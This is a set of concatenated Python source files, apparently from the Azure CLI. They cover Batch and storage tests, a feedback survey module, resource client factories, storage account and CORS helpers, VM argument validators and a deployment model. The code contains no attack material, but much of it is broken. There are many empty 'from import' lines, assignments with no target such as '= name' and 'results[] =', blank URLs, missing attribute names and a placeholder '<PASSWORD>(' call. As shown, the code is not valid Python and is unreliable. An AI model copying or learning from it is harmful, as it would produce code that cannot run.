create account with default set result = self.cmd('storage account create -g {} -n {} -l {} --sku Standard_LRS'. format(rg, sname, loc), checks=[ JMESPathCheck('name', sname), JMESPathCheck('location', loc), JMESPathCheck('resourceGroup', rg) ]) self.cmd('batch account create -g {} -n {} -l {} --storage-account-id {}'. format(rg, name, loc, result['id']), checks=[ JMESPathCheck('name', name), JMESPathCheck('location', loc), JMESPathCheck('resourceGroup', rg) ]) def tear_down(self): rg = self.resource_group sname = self.storage_account_name name = self.account_name self.cmd('storage account delete -g {} -n {}'.format(rg, sname)) self.cmd('batch account delete -g {} -n {}'.format(rg, name)) if os.path.exists(self.package_file_name): os.remove(self.package_file_name) def __init__(self, test_method): super(BatchMgmtApplicationScenarioTest, self).__init__(__file__, test_method) self.resource_group = 'vcr_resource_group' self.account_name = 'clibatchtest7' self.location = 'brazilsouth' self.storage_account_name = 'clibatchteststorage7' self.application_name = 'testapp' self.application_package_name = '1.0' self.package_file_name = os.path.join(os.getcwd(), '') def test_batch_application_mgmt(self): self.execute() def body(self): with open(self.package_file_name, 'w') as f: f.write('storage blob test sample file') rg = self.resource_group name = self.account_name aname = self.application_name ver = self.application_package_name # test create application with default set self.cmd('batch application create -g {} -n {} --application-id {} --allow-updates true'. format(rg, name, aname), checks=[ JMESPathCheck('id', aname), JMESPathCheck('allowUpdates', True) ]) self.cmd('batch application list -g {} -n {}'.format(rg, name), checks=[ JMESPathCheck('length(@)', 1), JMESPathCheck('[0].id', aname), ]) self.cmd('batch application package create -g {} -n {} --application-id {} --version {} --package-file "{}"'. #pylint: disable=line-too-long format(rg, name, aname, ver, self.package_file_name), checks=[ JMESPathCheck('id', aname), JMESPathCheck('storageUrl != null', True), JMESPathCheck('version', ver), JMESPathCheck('state', 'pending') ]) self.cmd('batch application package activate -g {} -n {} --application-id {} --version {} --format zip'.format(rg, name, aname, ver)) #pylint: disable=line-too-long self.cmd('batch application package show -g {} -n {} --application-id {} --version {}'. format(rg, name, aname, ver), checks=[ JMESPathCheck('id', aname), JMESPathCheck('format', 'zip'), JMESPathCheck('version', ver), JMESPathCheck('state', 'active') ]) self.cmd('batch application set -g {} -n {} --application-id {} --default-version {}'.format(rg, name, aname, ver)) #pylint: disable=line-too-long self.cmd('batch application show -g {} -n {} --application-id {}'.format(rg, name, aname), checks=[ JMESPathCheck('id', aname), JMESPathCheck('defaultVersion', ver), JMESPathCheck('packages[0].format', 'zip'), JMESPathCheck('packages[0].state', 'active') ]) # test batch applcation delete self.cmd('batch application package delete -g {} -n {} --application-id {} --version {}'. format(rg, name, aname, ver)) self.cmd('batch application delete -g {} -n {} --application-id {}'.format(rg, name, aname)) self.cmd('batch application list -g {} -n {}'.format(rg, name), checks=NoneCheck()) ``` #### File: command_modules/feedback/ ```python from __future__ import print_function import sys from six.moves import input #pylint: disable=redefined-builtin from azure.cli.core import __version__ as core_version import azure.cli.core._logging as _logging import # pylint: disable=unused-import logger = _logging.get_az_logger(__name__) MESSAGES = { 'intro': 'We appreciate your feedback! This survey is only two questions and should take less '\ 'than a minute.', 'prompt_how_likely': '\nHow likely is it you would recommend our Azure CLI to a friend or '\ 'colleague? [0 to 10]: ', 'prompt_what_changes': '\nWhat changes would we have to make for you to give us a higher '\ 'rating? ', 'prompt_do_well': '\nWhat do we do really well? ', 'prompt_email_addr': '\nIf you would like to join our insiders program and receive tips, '\ 'tricks, and early access to new features, let us know by leaving your '\ 'email address (leave blank to skip): ', 'thanks': '\nThanks for your feedback!' } INSTRUMENTATION_KEY = '02b91c82-6729-4241-befc-e6d02ca4fbba' EVENT_NAME = 'FeedbackEvent' COMPONENT_PREFIX = 'azure-cli-' def _prompt_net_promoter_score(): while True: try: score = int(input(MESSAGES['prompt_how_likely'])) if 0 <= score <= 10: return score raise ValueError except ValueError: logger.warning('Valid values are %s', list(range(11))) def _get_version_info(): from pip import get_installed_distributions installed_dists = get_installed_distributions(local_only=True) component_version_info = sorted([{'name': dist.key.replace(COMPONENT_PREFIX, ''), 'version': dist.version} for dist in installed_dists if dist.key.startswith(COMPONENT_PREFIX)], key=lambda x: x['name']) return str(component_version_info), sys.version def _send_feedback(score, response_what_changes, response_do_well, email_address): from applicationinsights import TelemetryClient tc = TelemetryClient(INSTRUMENTATION_KEY) tc.context.application.ver = core_version version_components, version_python = _get_version_info() tc.track_event( EVENT_NAME, {'response_what_changes': response_what_changes, 'response_do_well': response_do_well, 'response_email_address': email_address, 'version_components': version_components, 'version_python': version_python}, {'response_net_promoter_score':score}) tc.flush() def handle_feedback(): try: print(MESSAGES['intro']) score = _prompt_net_promoter_score() response_do_well = None response_what_changes = None if score == 10: response_do_well = input(MESSAGES['prompt_do_well']) else: response_what_changes = input(MESSAGES['prompt_what_changes']) email_address = input(MESSAGES['prompt_email_addr']) _send_feedback(score, response_what_changes, response_do_well, email_address) print(MESSAGES['thanks']) except (EOFError, KeyboardInterrupt): print() ``` #### File: command_modules/resource/ ```python def _resource_client_factory(**_): from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.mgmt.resource.resources import ResourceManagementClient return get_mgmt_service_client(ResourceManagementClient) def _resource_feature_client_factory(**_): from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.mgmt.resource.features import FeatureClient return get_mgmt_service_client(FeatureClient) def _resource_policy_client_factory(**_): from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.mgmt.resource.policy import PolicyClient return get_mgmt_service_client(PolicyClient) def cf_resource_groups(_): return _resource_client_factory().resource_groups def cf_resources(_): return _resource_client_factory().resources def cf_providers(_): return _resource_client_factory().providers def cf_tags(_): return _resource_client_factory().tags def cf_deployments(_): return _resource_client_factory().deployments def cf_deployment_operations(_): return _resource_client_factory().deployment_operations def cf_features(_): return _resource_feature_client_factory().features def cf_policy_definitions(_): return _resource_policy_client_factory().policy_definitions ``` #### File: command_modules/storage/ ```python from __future__ import print_function from sys import stderr from import Kind from import Logging, Metrics, CorsRule, RetentionPolicy from import BlockBlobService from import BaseBlobService from import FileService from import TableService from import QueueService from azure.cli.core._util import CLIError from import \ (storage_client_factory, generic_data_service_factory) def _update_progress(current, total): if total: message = 'Percent complete: %' percent_done = current * 100 / total message += '{: >5.1f}'.format(percent_done) print('\b' * len(message) + message, end='', file=stderr) stderr.flush() if current == total: print('', file=stderr) # CUSTOM METHODS def list_storage_accounts(resource_group_name=None): """ List storage accounts within a subscription or resource group. """ from import StorageAccount from msrestazure.azure_active_directory import UserPassCredentials scf = storage_client_factory() if resource_group_name: accounts = scf.storage_accounts.list_by_resource_group(resource_group_name) else: accounts = scf.storage_accounts.list() return list(accounts) def show_storage_account_usage(): """ Show the current count and limit of the storage accounts under the subscription. """ scf = storage_client_factory() return next((x for x in scf.usage.list() if == 'StorageAccounts'), None) #pylint: disable=no-member # pylint: disable=line-too-long def show_storage_account_connection_string( resource_group_name, account_name, protocol='https', blob_endpoint=None, file_endpoint=None, queue_endpoint=None, table_endpoint=None, key_name='primary'): """ Generate connection string for a storage account.""" from azure.cli.core._profile import CLOUD scf = storage_client_factory() keys = scf.storage_accounts.list_keys(resource_group_name, account_name).keys #pylint: disable=no-member endpoint_suffix = CLOUD.suffixes.storage_endpoint connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format( protocol, endpoint_suffix, account_name, keys[0].value if key_name == 'primary' else keys[1].value) #pylint: disable=no-member connection_string = '{}{}'.format(connection_string, ';BlobEndpoint={}'.format(blob_endpoint) if blob_endpoint else '') connection_string = '{}{}'.format(connection_string, ';FileEndpoint={}'.format(file_endpoint) if file_endpoint else '') connection_string = '{}{}'.format(connection_string, ';QueueEndpoint={}'.format(queue_endpoint) if queue_endpoint else '') connection_string = '{}{}'.format(connection_string, ';TableEndpoint={}'.format(table_endpoint) if table_endpoint else '') return {'connectionString': connection_string} def create_storage_account(resource_group_name, account_name, sku, location,, tags=None, custom_domain=None, encryption=None, access_tier=None): ''' Create a storage account. ''' from import \ (StorageAccountCreateParameters, Sku, CustomDomain, Encryption, AccessTier) scf = storage_client_factory() params = StorageAccountCreateParameters( sku=Sku(sku), kind=Kind(kind), location=location, tags=tags, custom_domain=CustomDomain(custom_domain) if custom_domain else None, encryption=encryption, access_tier=AccessTier(access_tier) if access_tier else None) return scf.storage_accounts.create(resource_group_name, account_name, params) def set_storage_account_properties( resource_group_name, account_name, sku=None, tags=None, custom_domain=None, encryption=None, access_tier=None): ''' Update storage account property (only one at a time).''' from import \ (StorageAccountUpdateParameters, Sku, CustomDomain, Encryption, AccessTier) scf = storage_client_factory() params = StorageAccountUpdateParameters( sku=Sku(sku) if sku else None, tags=tags, custom_domain=CustomDomain(custom_domain) if custom_domain else None, encryption=encryption, access_tier=AccessTier(access_tier) if access_tier else None) return scf.storage_accounts.update(resource_group_name, account_name, params) def upload_blob( # pylint: disable=too-many-locals client, container_name, blob_name, file_path, blob_type=None, content_settings=None, metadata=None, validate_content=False, maxsize_condition=None, max_connections=2, lease_id=None, if_modified_since=None, if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None): '''Upload a blob to a container.''' def upload_append_blob(): if not client.exists(container_name, blob_name): client.create_blob( container_name=container_name, blob_name=blob_name, content_settings=content_settings, metadata=metadata, lease_id=lease_id, if_modified_since=if_modified_since, if_match=if_match, if_none_match=if_none_match, timeout=timeout) return client.append_blob_from_path( container_name=container_name, blob_name=blob_name, file_path=file_path, progress_callback=_update_progress, validate_content=validate_content, maxsize_condition=maxsize_condition, lease_id=lease_id, timeout=timeout) def upload_block_blob(): return client.create_blob_from_path( container_name=container_name, blob_name=blob_name, file_path=file_path, progress_callback=_update_progress, content_settings=content_settings, metadata=metadata, validate_content=validate_content, max_connections=max_connections, lease_id=lease_id, if_modified_since=if_modified_since, if_unmodified_since=if_unmodified_since, if_match=if_match, if_none_match=if_none_match, timeout=timeout ) type_func = { 'append': upload_append_blob, 'block': upload_block_blob, 'page': upload_block_blob # same implementation } return type_func[blob_type]() upload_blob.__doc__ = BlockBlobService.create_blob_from_path.__doc__ def _get_service_container_type(client): if isinstance(client, BlockBlobService): return 'container' elif isinstance(client, FileService): return 'share' elif isinstance(client, TableService): return 'table' elif isinstance(client, QueueService): return 'queue' else: raise ValueError('Unsupported service {}'.format(type(client))) def _get_acl(client, container_name, **kwargs): container = _get_service_container_type(client) get_acl = getattr(client, 'get_{}_acl'.format(container)) lease_id = kwargs.get('lease_id', None) return get_acl(container_name, lease_id=lease_id) if lease_id else get_acl(container_name) def _set_acl(client, container_name, acl, **kwargs): container = _get_service_container_type(client) set_acl = getattr(client, 'set_{}_acl'.format(container)) lease_id = kwargs.get('lease_id', None) return set_acl(container_name, acl, lease_id=lease_id) if lease_id \ else set_acl(container_name, acl) def create_acl_policy( client, container_name, policy_name, start=None, expiry=None, permission=None, **kwargs): ''' Create a stored access policy on the containing object ''' from import AccessPolicy acl = _get_acl(client, container_name, **kwargs) acl[policy_name] = AccessPolicy(permission, expiry, start) return _set_acl(client, container_name, acl, **kwargs) def get_acl_policy(client, container_name, policy_name, **kwargs): ''' Show a stored access policy on a containing object ''' from import AccessPolicy acl = _get_acl(client, container_name, **kwargs) return acl.get(policy_name) def list_acl_policies(client, container_name, **kwargs): ''' List stored access policies on a containing object ''' return _get_acl(client, container_name, **kwargs) def set_acl_policy(client, container_name, policy_name, start=None, expiry=None, permission=None, **kwargs): ''' Set a stored access policy on a containing object ''' from import AccessPolicy if not (start or expiry or permission): raise CLIError('Must specify at least one property when updating an access policy.') acl = _get_acl(client, container_name, **kwargs) try: policy = acl[policy_name] policy.start = start or policy.start policy.expiry = expiry or policy.expiry policy.permission = permission or policy.permission except KeyError: raise CLIError('ACL does not contain {}'.format(policy_name)) return _set_acl(client, container_name, acl, **kwargs) def delete_acl_policy(client, container_name, policy_name, **kwargs): ''' Delete a stored access policy on a containing object ''' acl = _get_acl(client, container_name, **kwargs) del acl[policy_name] return _set_acl(client, container_name, acl, **kwargs) def insert_table_entity(client, table_name, entity, if_exists='fail', timeout=None): if if_exists == 'fail': client.insert_entity(table_name, entity, timeout) elif if_exists == 'merge': client.insert_or_merge_entity(table_name, entity, timeout) elif if_exists == 'replace': client.insert_or_replace_entity(table_name, entity, timeout) else: raise CLIError("Unrecognized value '{}' for --if-exists".format(if_exists)) class ServiceProperties(object): def __init__(self, name, service): = name self.service = service self.client = None def init_client(self, account_name=None, account_key=None, connection_string=None, sas_token=None): if not self.client: self.client = generic_data_service_factory( self.service, account_name, account_key, connection_string, sas_token) def get_service_properties(self): if not self.client: raise CLIError('Must call init_client before attempting get_service_properties!') return getattr(self.client, 'get_{}_service_properties'.format( def set_service_properties(self): if not self.client: raise CLIError('Must call init_client before attempting set_service_properties!') return getattr(self.client, 'set_{}_service_properties'.format( def get_logging(self, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): self.init_client(account_name, account_key, connection_string, sas_token) return self.get_service_properties()(timeout=timeout).__dict__['logging'] def set_logging(self, read, write, delete, retention, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): self.init_client(account_name, account_key, connection_string, sas_token) retention_policy = RetentionPolicy( enabled=retention != 0, days=retention ) logging = Logging(delete, read, write, retention_policy) return self.set_service_properties()(logging=logging, timeout=timeout) def get_cors(self, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): self.init_client(account_name, account_key, connection_string, sas_token) return self.get_service_properties()(timeout=timeout).__dict__['cors'] def add_cors(self, origins, methods, max_age, exposed_headers=None, allowed_headers=None, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): cors = self.get_cors(account_name, account_key, connection_string, sas_token, timeout) new_rule = CorsRule(origins, methods, max_age, exposed_headers, allowed_headers) cors.append(new_rule) return self.set_service_properties()(cors=cors, timeout=timeout) def clear_cors(self, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): self.init_client(account_name, account_key, connection_string, sas_token) return self.set_service_properties()(cors=[], timeout=timeout) def get_metrics(self, interval, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): self.init_client(account_name, account_key, connection_string, sas_token) props = self.get_service_properties()(timeout=timeout) metrics = {} if interval == 'both': metrics['hour'] = props.__dict__['hour_metrics'] metrics['minute'] = props.__dict__['minute_metrics'] else: metrics[interval] = props.__dict__['{}_metrics'.format(interval)] return metrics def set_metrics(self, retention, hour, minute, api=None, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): self.init_client(account_name, account_key, connection_string, sas_token) retention_policy = RetentionPolicy( enabled=retention != 0, days=retention ) hour_metrics = Metrics(hour, api, retention_policy) if hour is not None else None minute_metrics = Metrics(minute, api, retention_policy) if minute is not None else None return self.set_service_properties()( hour_metrics=hour_metrics, minute_metrics=minute_metrics, timeout=timeout) SERVICES = { 'b': ServiceProperties('blob', BaseBlobService), 'f': ServiceProperties('file', FileService), 'q': ServiceProperties('queue', QueueService), 't': ServiceProperties('table', TableService) } def list_cors(services='bfqt', account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): results = {} for character in services: properties = SERVICES[character] results[] = properties.get_cors( account_name, account_key, connection_string, sas_token, timeout) return results def add_cors(services, origins, methods, max_age=0, exposed_headers=None, allowed_headers=None, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): for character in services: properties = SERVICES[character] properties.add_cors( origins, methods, max_age, exposed_headers, allowed_headers, account_name, account_key, connection_string, sas_token, timeout) return None def clear_cors(services, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): for character in services: properties = SERVICES[character] properties.clear_cors( account_name, account_key, connection_string, sas_token, timeout) return None def set_logging(services, log, retention, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): for character in services: properties = SERVICES[character] properties.set_logging( 'r' in log, 'w' in log, 'd' in log, retention, account_name, account_key, connection_string, sas_token, timeout) return None def set_metrics(services, retention, hour=None, minute=None, api=None, account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): for character in services: properties = SERVICES[character] properties.set_metrics( retention, hour, minute, api, account_name, account_key, connection_string, sas_token, timeout) return None def get_logging(services='bqt', account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): results = {} for character in services: properties = SERVICES[character] results[] = properties.get_logging( account_name, account_key, connection_string, sas_token, timeout) return results def get_metrics(services='bfqt', interval='both', account_name=None, account_key=None, connection_string=None, sas_token=None, timeout=None): results = {} for character in services: properties = SERVICES[character] results[] = properties.get_metrics( interval, account_name, account_key, connection_string, sas_token, timeout) return results ``` #### File: storage/tests/ ```python import os import os.path import shutil from unittest import TestCase from .integration_test_base import StorageIntegrationTestBase from azure.cli.main import main as cli_main class StorageBlobDownloadPlainTests(TestCase): def test_blob_download_help(self): with self.assertRaises(SystemExit): cli_main('storage blob upload-batch -h'.split()) class StorageBlobDownloadIntegrationTests(StorageIntegrationTestBase): @classmethod def setUpClass(cls): StorageIntegrationTestBase.setUpClass() # set up sample container cls._test_source_container = cls.generate_new_container_name() assert cls._blob_service.create_container(cls._test_source_container) cli_main('storage blob upload-batch -s {} -d {} --connection-string {}' .format(cls._resource_folder, cls._test_source_container, cls._test_connection_string) .split()) test_blobs = [ for b in cls._blob_service.list_blobs(cls._test_source_container)] assert len(test_blobs) == 41 @classmethod def tearDownClass(cls): cls._blob_service.delete_container(cls._test_source_container) def setUp(self): self._test_folder = os.path.join(os.getcwd(), 'test_temp') if os.path.exists(self._test_folder): shutil.rmtree(self._test_folder) os.mkdir(self._test_folder) def test_blob_download_recursively_without_pattern(self): cmd = 'storage blob download-batch -s {} -d {} --account-name {} --account-key {}'\ .format(self._test_source_container, self._test_folder, self._blob_service.account_name, self._blob_service.account_key) cli_main(cmd.split()) assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 41 def test_blob_download_recursively_with_pattern_1(self): cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\ .format(self._blob_service.primary_endpoint, self._test_source_container, self._test_folder, '*', self._blob_service.account_key) cli_main(cmd.split()) assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 41 def test_blob_download_recursively_with_pattern_2(self): cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\ .format(self._blob_service.primary_endpoint, self._test_source_container, self._test_folder, 'apple/*', self._blob_service.account_key) cli_main(cmd.split()) assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 10 def test_blob_download_recursively_with_pattern_3(self): cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\ .format(self._blob_service.primary_endpoint, self._test_source_container, self._test_folder, '*/file_0', self._blob_service.account_key) cli_main(cmd.split()) assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 4 ``` #### File: storage/tests/ ```python import unittest from six import StringIO from collections import namedtuple from import * class Test_storage_validators(unittest.TestCase): @classmethod def setUpClass(cls): pass @classmethod def tearDownClass(cls): pass def setUp(self): = StringIO() def tearDown(self): def test_permission_validator(self): from import ContainerPermissions from argparse import Namespace ns1 = Namespace(permission='rwdl') ns2 = Namespace(permission='abc') get_permission_validator(ContainerPermissions)(ns1) self.assertTrue(isinstance(ns1.permission, ContainerPermissions)) with self.assertRaises(ValueError): get_permission_validator(ContainerPermissions)(ns2) def test_datetime_string_type(self): input = "2017-01-01T12:30Z" actual = datetime_string_type(input) expected = "2017-01-01T12:30Z" self.assertEqual(actual, expected) input = "2017-01-01 12:30" with self.assertRaises(ValueError): actual = datetime_string_type(input) def test_datetime_type(self): input = "2017-01-01T12:30Z" actual = datetime_type(input) expected = datetime(2017, 1, 1, 12, 30, 0) self.assertEqual(actual, expected) input = "2017-01-01 12:30" with self.assertRaises(ValueError): actual = datetime_type(input) def test_ipv4_range_type(self): input = "" actual = ipv4_range_type(input) expected = input self.assertEqual(actual, expected) input = "" actual = ipv4_range_type(input) expected = input self.assertEqual(actual, expected) input = "111.22" with self.assertRaises(ValueError): actual = ipv4_range_type(input) input = "" with self.assertRaises(ValueError): actual = ipv4_range_type(input) def test_resource_types_type(self): input = "sso" actual = str(resource_type_type(input)) expected = "so" self.assertEqual(actual, expected) input = "blob" with self.assertRaises(ValueError): actual = resource_type_type(input) def test_services_type(self): input = "ttfqbqtf" actual = str(services_type(input)) expected = "bqtf" self.assertEqual(actual, expected) input = "everything" with self.assertRaises(ValueError): actual = services_type(input) if __name__ == '__main__': unittest.main() ``` #### File: command_modules/vm/ ```python import argparse import json import os import re from azure.cli.core._util import CLIError from azure.cli.core.application import APPLICATION from azure.cli.core.commands.parameters import get_one_of_subscription_locations from azure.cli.core.commands.arm import resource_exists import azure.cli.core._logging as _logging from six.moves.urllib.request import urlopen #pylint: disable=import-error from ._client_factory import _compute_client_factory from ._vm_utils import read_content_if_is_file logger = _logging.get_az_logger(__name__) class VMImageFieldAction(argparse.Action): #pylint: disable=too-few-public-methods def __call__(self, parser, namespace, values, option_string=None): image = values match = re.match('([^:]*):([^:]*):([^:]*):([^:]*)', image) if image.lower().endswith('.vhd'): namespace.os_disk_type = 'custom' namespace.custom_os_disk_uri = image elif match: namespace.os_type = 'Custom' namespace.os_publisher = namespace.os_offer = namespace.os_sku = namespace.os_version = else: images = load_images_from_aliases_doc() matched = next((x for x in images if x['urnAlias'].lower() == image.lower()), None) if matched is None: raise CLIError('Invalid image "{}". Please pick one from {}' \ .format(image, [x['urnAlias'] for x in images])) namespace.os_type = 'Custom' namespace.os_publisher = matched['publisher'] namespace.os_offer = matched['offer'] namespace.os_sku = matched['sku'] namespace.os_version = matched['version'] class VMSSHFieldAction(argparse.Action): #pylint: disable=too-few-public-methods def __call__(self, parser, namespace, values, option_string=None): namespace.ssh_key_value = read_content_if_is_file(values) class VMDNSNameAction(argparse.Action): #pylint: disable=too-few-public-methods def __call__(self, parser, namespace, values, option_string=None): dns_value = values if dns_value: namespace.dns_name_type = 'new' namespace.dns_name_for_public_ip = dns_value class PrivateIpAction(argparse.Action): #pylint: disable=too-few-public-methods def __call__(self, parser, namespace, values, option_string=None): private_ip = values namespace.private_ip_address = private_ip if private_ip: namespace.private_ip_address_allocation = 'static' def _resource_not_exists(resource_type): def _handle_resource_not_exists(namespace): # TODO: hook up namespace._subscription_id once we support it ns, t = resource_type.split('/') if resource_exists(namespace.resource_group_name,, ns, t): raise CLIError('Resource {} of type {} in group {} already exists.'.format(, resource_type, namespace.resource_group_name)) return _handle_resource_not_exists def _handle_auth_types(**kwargs): if kwargs['command'] != 'vm create' and kwargs['command'] != 'vmss create': return args = kwargs['args'] is_windows = 'Windows' in args.os_offer \ and getattr(args, 'custom_os_disk_type', None) != 'linux' if not args.authentication_type: args.authentication_type = 'password' if is_windows else 'ssh' if args.authentication_type == 'password': if args.ssh_dest_key_path: raise CLIError('SSH parameters cannot be used with password authentication type') elif not args.admin_password: import getpass args.admin_password = <PASSWORD>('Admin Password: ') elif args.authentication_type == 'ssh': if args.admin_password: raise CLIError('Admin password cannot be used with SSH authentication type') ssh_key_file = os.path.join(os.path.expanduser('~'), '.ssh/') if not args.ssh_key_value: if os.path.isfile(ssh_key_file): with open(ssh_key_file) as f: args.ssh_key_value = else: raise CLIError('An RSA key file or key value must be supplied to SSH Key Value') if hasattr(args, 'network_security_group_type'): args.network_security_group_rule = 'RDP' if is_windows else 'SSH' if hasattr(args, 'nat_backend_port') and not args.nat_backend_port: args.nat_backend_port = '3389' if is_windows else '22' APPLICATION.register(APPLICATION.COMMAND_PARSER_PARSED, _handle_auth_types) def load_images_from_aliases_doc(publisher=None, offer=None, sku=None): target_url = ('' 'master/arm-compute/quickstart-templates/aliases.json') txt = urlopen(target_url).read() dic = json.loads(txt.decode()) try: all_images = [] result = (dic['outputs']['aliases']['value']) for v in result.values(): #loop around os for alias, vv in v.items(): #loop around distros all_images.append({ 'urnAlias': alias, 'publisher': vv['publisher'], 'offer': vv['offer'], 'sku': vv['sku'], 'version': vv['version'] }) all_images = [i for i in all_images if (_partial_matched(publisher, i['publisher']) and _partial_matched(offer, i['offer']) and _partial_matched(sku, i['sku']))] return all_images except KeyError: raise CLIError('Could not retrieve image list from {}'.format(target_url)) def load_images_thru_services(publisher, offer, sku, location): from concurrent.futures import ThreadPoolExecutor, as_completed all_images = [] client = _compute_client_factory() if location is None: location = get_one_of_subscription_locations() def _load_images_from_publisher(publisher): offers = client.virtual_machine_images.list_offers(location, publisher) if offer: offers = [o for o in offers if _partial_matched(offer,] for o in offers: skus = client.virtual_machine_images.list_skus(location, publisher, if sku: skus = [s for s in skus if _partial_matched(sku,] for s in skus: images = client.virtual_machine_images.list(location, publisher,, for i in images: all_images.append({ 'publisher': publisher, 'offer':, 'sku':, 'version':}) publishers = client.virtual_machine_images.list_publishers(location) if publisher: publishers = [p for p in publishers if _partial_matched(publisher,] publisher_num = len(publishers) if publisher_num > 1: with ThreadPoolExecutor(max_workers=40) as executor: tasks = [executor.submit(_load_images_from_publisher, for p in publishers] for t in as_completed(tasks): t.result() # don't use the result but expose exceptions from the threads elif publisher_num == 1: _load_images_from_publisher(publishers[0].name) return all_images def load_extension_images_thru_services(publisher, name, version, location, show_latest=False): from concurrent.futures import ThreadPoolExecutor, as_completed ##pylint: disable=no-name-in-module,import-error from distutils.version import LooseVersion all_images = [] client = _compute_client_factory() if location is None: location = get_one_of_subscription_locations() def _load_extension_images_from_publisher(publisher): types = client.virtual_machine_extension_images.list_types(location, publisher) if name: types = [t for t in types if _partial_matched(name,] for t in types: versions = client.virtual_machine_extension_images.list_versions(location, publisher, if version: versions = [v for v in versions if _partial_matched(version,] if show_latest: #pylint: disable=no-member versions.sort(key=lambda v: LooseVersion(, reverse=True) all_images.append({ 'publisher': publisher, 'name':, 'version': versions[0].name}) else: for v in versions: all_images.append({ 'publisher': publisher, 'name':, 'version':}) publishers = client.virtual_machine_images.list_publishers(location) if publisher: publishers = [p for p in publishers if _partial_matched(publisher,] publisher_num = len(publishers) if publisher_num > 1: with ThreadPoolExecutor(max_workers=40) as executor: tasks = [executor.submit(_load_extension_images_from_publisher, for p in publishers] for t in as_completed(tasks): t.result() # don't use the result but expose exceptions from the threads elif publisher_num == 1: _load_extension_images_from_publisher(publishers[0].name) return all_images def get_vm_sizes(location): return list(_compute_client_factory().virtual_machine_sizes.list(location)) def _partial_matched(pattern, string): if not pattern: return True # empty pattern means wildcard-match pattern = r'.*' + pattern return re.match(pattern, string, re.I) def _create_image_instance(publisher, offer, sku, version): return { 'publisher': publisher, 'offer': offer, 'sku': sku, 'version': version } def _handle_container_ssh_file(**kwargs): if kwargs['command'] != 'acs create': return args = kwargs['args'] string_or_file = args.ssh_key_value content = string_or_file if os.path.exists(string_or_file):'Use existing SSH public key file: %s', string_or_file) with open(string_or_file, 'r') as f: content = elif not _is_valid_ssh_rsa_public_key(content) and args.generate_ssh_keys: #figure out appropriate file names: #'base_name'(with private keys), and ''(with public keys) public_key_filepath = string_or_file if public_key_filepath[-4:].lower() == '.pub': private_key_filepath = public_key_filepath[:-4] else: private_key_filepath = public_key_filepath + '.private' content = _generate_ssh_keys(private_key_filepath, public_key_filepath) logger.warning('Created SSH key files: %s,%s', private_key_filepath, public_key_filepath) args.ssh_key_value = content def _generate_ssh_keys(private_key_filepath, public_key_filepath): import paramiko ssh_dir, _ = os.path.split(private_key_filepath) if not os.path.exists(ssh_dir): os.makedirs(ssh_dir) os.chmod(ssh_dir, 0o700) key = paramiko.RSAKey.generate(2048) key.write_private_key_file(private_key_filepath) os.chmod(private_key_filepath, 0o600) with open(public_key_filepath, 'w') as public_key_file: public_key = '%s %s' % (key.get_name(), key.get_base64()) public_key_file.write(public_key) os.chmod(public_key_filepath, 0o644) return public_key def _is_valid_ssh_rsa_public_key(openssh_pubkey): # #pylint: disable=line-too-long #A "good enough" check is to see if the key starts with the correct header. import struct try: from base64 import decodebytes as base64_decode except ImportError: #deprecated and redirected to decodebytes in Python 3 from base64 import decodestring as base64_decode parts = openssh_pubkey.split() if len(parts) < 2: return False key_type = parts[0] key_string = parts[1] data = base64_decode(key_string.encode())#pylint:disable=deprecated-method int_len = 4 str_len = struct.unpack('>I', data[:int_len])[0] # this should return 7 return data[int_len:int_len+str_len] == key_type.encode() APPLICATION.register(APPLICATION.COMMAND_PARSER_PARSED, _handle_container_ssh_file) ``` #### File: lib/models/ ```python from msrest.serialization import Model class DeploymentAvailSet(Model): """ Deployment operation parameters. Variables are only populated by the server, and will be ignored when sending a request. :ivar uri: URI referencing the template. Default value: "" . :vartype uri: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param location: Location to deploy the availability set. :type location: str :param name: Name of the availability set. :type name: str :param platform_fault_domain_count: Number of Fault Domains. Default value: "3" . :type platform_fault_domain_count: str :param platform_update_domain_count: Number of Update Domains. Default value: "5" . :type platform_update_domain_count: str :param tags: Tags object. :type tags: object :ivar mode: Gets or sets the deployment mode. Default value: "Incremental" . :vartype mode: str """ _validation = { 'uri': {'required': True, 'constant': True}, 'name': {'required': True}, 'mode': {'required': True, 'constant': True}, } _attribute_map = { 'uri': {'key': 'properties.templateLink.uri', 'type': 'str'}, 'content_version': {'key': 'properties.templateLink.contentVersion', 'type': 'str'}, 'location': {'key': 'properties.parameters.location.value', 'type': 'str'}, 'name': {'key': '', 'type': 'str'}, 'platform_fault_domain_count': {'key': 'properties.parameters.platformFaultDomainCount.value', 'type': 'str'}, 'platform_update_domain_count': {'key': 'properties.parameters.platformUpdateDomainCount.value', 'type': 'str'}, 'tags': {'key': 'properties.parameters.tags.value', 'type': 'object'}, 'mode': {'key': 'properties.mode', 'type': 'str'}, } uri = "" mode = "Incremental" def __init__(self, name, content_version=None, location=None, platform_fault_domain_count="3", platform_update_domain_count="5", tags=None): self.content_version = content_version self.location = location = name self.platform_fault_domain_count = platform_fault_domain_count self.platform_update_domain_count = platform_update_domain_count self.tags = tags ```
